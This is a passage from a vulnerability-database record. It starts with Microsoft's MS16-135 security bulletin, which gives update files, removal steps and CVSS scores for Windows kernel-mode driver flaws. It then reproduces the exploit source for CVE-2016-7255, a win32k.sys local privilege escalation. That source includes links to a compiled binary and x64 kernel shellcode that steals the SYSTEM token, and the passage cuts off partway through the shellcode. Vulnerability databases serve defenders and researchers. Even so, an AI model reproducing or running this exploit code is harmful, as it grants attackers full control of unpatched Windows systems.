id=\"kb-link-22\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">WUSA.exe does not support uninstalling updates. To uninstall an update that is installed by WUSA, click <strong class=\"uiterm\">Control Panel</strong>, and then click <span class=\"text-base\">Security</span>. Under <span class=\"sbody-userinput\">Windows Update</span>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3198234\" id=\"kb-link-23\" target=\"_self\">Microsoft Knowledge Base Article 3198234</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows 7 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 7:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197867</span><span class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td 
class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 7<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197868</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 7:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197867</span><span class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 7:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197868</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-24\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall </span>setup switch or click <strong class=\"uiterm\">Control Panel</strong>, and then click <strong class=\"uiterm\">System and Security</strong>. 
Under <strong class=\"uiterm\">Windows Update</strong>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3197867\" id=\"kb-link-25\" target=\"_self\">Microsoft Knowledge Base Article 3197867</a><br/>See <a href=\"https://support.microsoft.com/help/3197868\" id=\"kb-link-26\" target=\"_self\">Microsoft Knowledge Base Article 3197868</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows Server 2008 R2 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197867</span><span class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197868</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported Itanium-based editions of Windows Server 2008 R2:<br/><span 
class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197867</span><span class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported Itanium-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197868</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-27\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>. 
Under <strong class=\"uiterm\">Windows Update</strong>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3197867\" id=\"kb-link-28\" target=\"_self\">Microsoft Knowledge Base Article 3197867</a><br/>See <a href=\"https://support.microsoft.com/help/3197868\" id=\"kb-link-29\" target=\"_self\">Microsoft Knowledge Base Article 3197868</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows 8.1 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 8.1:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197873</span><span class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 8.1:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197874</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 8.1:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197873</span><span 
class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 8.1:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197874</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-30\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. 
Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3197873\" id=\"kb-link-31\" target=\"_self\">Microsoft Knowledge Base Article 3197873</a><br/>See <a href=\"https://support.microsoft.com/help/3197874\" id=\"kb-link-32\" target=\"_self\">Microsoft Knowledge Base Article 3197874</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows Server 2012 and Windows Server 2012 R2 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197876</span><span class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197877</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012 R2:<br/><span 
class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197873</span><span class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012 R2:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197874</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-33\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. 
Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3197876\" id=\"kb-link-34\" target=\"_self\">Microsoft Knowledge Base Article 3197876</a><br/>See <a href=\"https://support.microsoft.com/help/3197877\" id=\"kb-link-35\" target=\"_self\">Microsoft Knowledge Base Article 3197877</a><br/>See <a href=\"https://support.microsoft.com/help/3197873\" id=\"kb-link-36\" target=\"_self\">Microsoft Knowledge Base Article 3197873</a><br/>See <a href=\"https://support.microsoft.com/help/3197874\" id=\"kb-link-37\" target=\"_self\">Microsoft Knowledge Base Article 3197874</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows RT 8.1 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Deployment</span></td><td class=\"sbody-td\">The 3197874 Monthly Only update is available via <a href=\"http://go.microsoft.com/fwlink/?linkid=21130\" id=\"kb-link-38\" target=\"_self\">Windows Update</a> only.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart Requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal 
Information</span></td><td class=\"sbody-td\">Click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File Information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3197874\" id=\"kb-link-39\" target=\"_self\">Microsoft Knowledge Base Article 3197874</a></td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows 10 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 10:<br/><span class=\"text-base\">Windows10.0-KB3198585-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 10:<br/><span class=\"text-base\">Windows10.0-KB3198585-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 10 Version 1511:<br/><span class=\"text-base\">Windows10.0-KB3198586-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 10 Version 1511:<br/><span class=\"text-base\">Windows10.0-KB3198586-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 10 Version 1607:<br/><span 
class=\"text-base\">Windows10.0-KB3200970-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 10 Version 1607:<br/><span class=\"text-base\">Windows10.0-KB3200970-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-40\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. 
Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3198585\" id=\"kb-link-41\" target=\"_self\">Microsoft Knowledge Base Article 3198585</a><br/>See <a href=\"https://support.microsoft.com/help/3198586\" id=\"kb-link-42\" target=\"_self\">Microsoft Knowledge Base Article 3198586</a><br/>See <a href=\"https://support.microsoft.com/help/3200970\" id=\"kb-link-43\" target=\"_self\">Microsoft Knowledge Base Article 3200970</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows Server 2016 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2016:<br/><span class=\"text-base\">WindowsServer2016-KB3200970-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-44\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this 
security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3200970\" id=\"kb-link-45\" target=\"_self\">Microsoft Knowledge Base Article 3200970</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div></div><br/></span></div></div></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-46\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-47\" target=\"_self\">TechNet 
Security Troubleshooting and Support</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-48\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-49\" target=\"_self\">International Support</a></div><br/></span></div></div></div><a class=\"bookmark\" id=\"fileinfo\"></a></div></body></html>", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-11-08T00:00:00", "type": "mskb", "title": "MS16-135: Security update for Windows kernel-mode drivers: November 8, 2016", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7246", "CVE-2016-7218", "CVE-2016-7214", "CVE-2016-7255", "CVE-2016-7215"], "modified": "2016-11-11T01:17:01", "id": "KB3199135", "href": "https://support.microsoft.com/en-us/help/3199135/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:33", "description": "\nMicrosoft Windows Kernel - 
win32k.sys NtSetWindowLongPtr Local Privilege Escalation (MS16-135) (2)", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-08T00:00:00", "title": "Microsoft Windows Kernel - win32k.sys NtSetWindowLongPtr Local Privilege Escalation (MS16-135) (2)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255"], "modified": "2017-01-08T00:00:00", "id": "EXPLOITPACK:3A596E79FE66F4077B2897D4B2D5D53B", "href": "", "sourceData": "/*\nSource: https://ricklarabee.blogspot.com/2017/01/virtual-memory-page-tables-and-one-bit.html\n\nBinary: https://github.com/rlarabee/exploits/raw/8b9eb646516d7f022a010f28018209f331c28975/cve-2016-7255/compiled/cve-2016-7255.exe\nMirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41015.exe\n*/\n\n// ricklarabee.blogspot.com\n\n//This program is free software; you can redistribute it and/or\n//modify it under the terms of the GNU General Public License\n//as published by the Free Software Foundation.\n\n//This program is distributed in the hope that it will be useful,\n//but WITHOUT ANY WARRANTY; without even the implied 
warranty of\n//MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the\n//GNU General Public License for more details.\n\n//You should have received a copy of the GNU General Public License\n//along with this program; if not, write to the Free Software\n//Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n\n// Credits: enrique.nissim@IOActive.com: https://github.com/IOActive/I-know-where-your-page-lives/tree/master/code/CVE-2016-7255\n// PoC from https://github.com/tinysec/public/tree/master/CVE-2016-7255\n\n#include <windows.h>\n#include <wchar.h>\n#include <stdlib.h>\n#include <stdio.h>\n\n#pragma comment(lib,\"ntdll.lib\")\n#pragma comment(lib,\"user32.lib\")\n#pragma comment(lib, \"advapi32\")\n\nUINT64 PML4_BASE;\nUINT PML4_SELF_REF_INDEX;\nUINT64 PML4_SELF_REF = 0xFFFFF6FB7DBEDF68;\n\n#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)\n#define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L)\n#define GET_INDEX(va) ( ((va >> 39) & 0x1ff )) \n\n////////////////////////////////////////////////////////\n// Define Data Types\n////////////////////////////////////////////////////////\ntypedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {\n PVOID Unknown1;\n PVOID Unknown2;\n PVOID Base;\n ULONG Size;\n ULONG Flags;\n USHORT Index;\n USHORT NameLength;\n USHORT LoadCount;\n USHORT PathLength;\n CHAR ImageName[256];\n} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;\n\ntypedef struct _SYSTEM_MODULE_INFORMATION {\n ULONG Count;\n SYSTEM_MODULE_INFORMATION_ENTRY Module[1];\n} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;\n\ntypedef enum _SYSTEM_INFORMATION_CLASS { \n SystemModuleInformation = 11,\n SystemHandleInformation = 16\n} SYSTEM_INFORMATION_CLASS;\n\ntypedef NTSTATUS (WINAPI *NtQuerySystemInformation_t)(IN SYSTEM_INFORMATION_CLASS SystemInformationClass,\n OUT PVOID SystemInformation,\n IN ULONG SystemInformationLength,\n OUT PULONG ReturnLength);\n\ntypedef NTSTATUS (WINAPI *NtQueryIntervalProfile_t)(IN ULONG 
ProfileSource,\n\t\t\t\t\t\t\t\t\t\t\t\t\tOUT PULONG Interval);\n\nNtQuerySystemInformation_t NtQuerySystemInformation;\nNtQueryIntervalProfile_t NtQueryIntervalProfile;\n \nchar shellcode[] = {\n\t//0xcc,\n\t0xfa, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// CLI\n\t0x9c, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSHFQ\n\t0x48, 0xb8, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, \t// MOV RAX, Original Pointer\n\t0x50, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RAX\n\t0x51, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RCX\n\t0x48, 0xb9, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, \t// MOV RCX, [OverwriteAddr+OverwriteOffset]\n\t0x48, 0x89, 0x01, \t\t\t\t\t\t\t\t\t\t\t\t// MOV QWORD PTR [RCX], RAX\n\t0xb9, 0x90, 0x90, 0x90, 0x90, \t\t\t\t\t\t\t\t\t// MOV ECX, PID\n\t0x53, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RBX\n\n\t0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, \t\t\t// MOV RAX,QWORD PTR gs:0x188\n\t0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00,\t\t\t\t\t\t// MOV RAX,QWORD PTR [RAX+0xb8] EPROCESS\n\t0x48, 0x8d, 0x80, 0x90, 0x90, 0x00, 0x00,\t\t\t\t\t\t// LEA RAX,[RAX+0xActiveProcessLinkOffset] \n\t//<tag>\n\t0x48, 0x8b, 0x00,\t\t\t\t\t\t\t\t\t\t\t\t// MOV RAX,QWORD PTR [RAX]\n\t0x48, 0x8b, 0x58, 0xf8,\t\t\t\t\t\t\t\t\t\t\t// MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID\n\t0x48, 0x83, 0xfb, 0x04,\t\t\t\t\t\t\t\t\t\t\t// CMP RBX,0x4\n\t0x75, 0xf3,\t\t\t\t\t\t\t\t\t\t\t\t\t\t// JNE <tag>\n\t0x48, 0x8b, 0x98, 0x90, 0x90, 0x90, 0x90,\t\t\t\t\t\t// MOV RBX, QWORD PTR [RAX+0x60] // GET TOKEN of SYSTEM\n\n\t0x53, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RBX\n\t//<tag2>\n\t0x48, 0x8b, 0x00,\t\t\t\t\t\t\t\t\t\t\t\t// MOV RAX,QWORD PTR [RAX]\n\t0x48, 0x8b, 0x58, 0xf8,\t\t\t\t\t\t\t\t\t\t\t// MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID\n\t0x39, 0xcb,\t\t\t\t\t\t\t\t\t\t\t\t\t\t// CMP EBX, ECX // our PID\n\t0x75, 0xf5,\t\t\t\t\t\t\t\t\t\t\t\t\t\t// JNE <tag2>\n\t0x5b, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// POP RBX\n\t0x48, 0x89, 0x98, 0x90, 0x90, 0x90, 0x90,\t\t\t\t\t\t// MOV QWORD PTR[RAX + 0x60], 
